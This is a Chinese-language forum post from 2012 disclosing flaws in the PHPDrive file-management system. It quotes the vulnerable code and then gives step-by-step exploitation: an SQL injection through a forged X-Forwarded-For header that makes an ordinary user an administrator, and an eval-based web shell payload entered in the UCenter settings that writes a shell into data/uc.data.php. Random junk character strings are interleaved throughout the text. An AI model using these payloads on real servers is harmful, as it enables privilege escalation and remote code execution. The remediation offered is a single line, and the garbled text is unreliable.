PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等7 @; ~, p: G1 z6 g* R2 `
# z- }- Z& g9 G$ J) u
includes/user.lib.php. e W$ d$ r' q, F; z
行87 Z G# ^: T4 K1 g
function get_ip() {
$ D' F0 i; ^2 ?! [$ |& f+ z: M if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.3 m( x3 [- J; |( R! [! H
在用户注册与登录 处module/disk/account.lead.php
+ L9 D1 D5 S" \1 f+ s8 z: L0 C198行
, t; F3 _3 ^9 V, [" p7 [9 ^# Q0 O //更新本次登录IP和时间* s1 @& U$ a$ b" k" T0 w" V/ l
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
, E4 f5 K( }9 ?$ b6 ~4 e$ v$ t由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限. K& y- m: M1 T3 w% Y: W$ x( q% m/ Y
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
0 S. _2 M0 k7 d后台getshell:& T0 z0 q1 R( v' l$ T; {, ?9 z. s
在UCenter设置处,将UC数据库登录名填写为% Q$ |' D: s& j; S }' m6 |5 m
2 P7 x) o* Q; P& C# broot’);eval($_POST[DisKill]);?>/*
+ m, y* o* l+ T8 m0 F$ c5 n* y+ s D可以得到一个shell,位置在 data/uc.data.php
- L Z( t: y9 u. X# k, f( w& ]+ d0 z8 q( p8 K1 Q: g
修复:过滤注入" P8 p! O% x$ y+ h7 S
% F ^+ r, }+ ], G. H1 W8 p
|
发表于 2012-12-31 09:18:34
收藏
支持
反对